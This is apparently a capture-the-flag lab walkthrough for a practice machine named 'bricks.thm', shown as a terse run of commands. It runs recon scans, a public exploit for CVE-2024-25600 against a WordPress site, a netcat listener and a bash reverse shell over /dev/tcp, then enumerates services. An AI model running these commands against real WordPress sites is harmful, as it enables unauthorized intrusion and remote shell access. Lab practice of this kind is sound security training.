echo $VICTIM bricks.thm >> /etc/hosts
cat /etc/hostsInitial scan
Kali
nmap -A $VICTIM
Longer scan
Kali
Kali
Kali
Kali
Kali
Kali
Kali(Shell)
Victim
Victim
Last updated
nmap -sV -sT -O -p 1-65535 $VICTIMgobuster dir -u http://bricks.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtgobuster dir -k -u https://bricks.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtwpscan --url https://bricks.thm/ --disable-tls-checksgit clone https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT.git
cd CVE-2024-25600-EXPLOIT/
python CVE-2024-25600.py -u https://bricks.thm/nc -lvnp 1337bash -c 'exec bash -i >& /dev/tcp/10.10.181.161/1337 0>&1'systemctl list-units --type=service --state=runningsystemctl cat ubuntu.service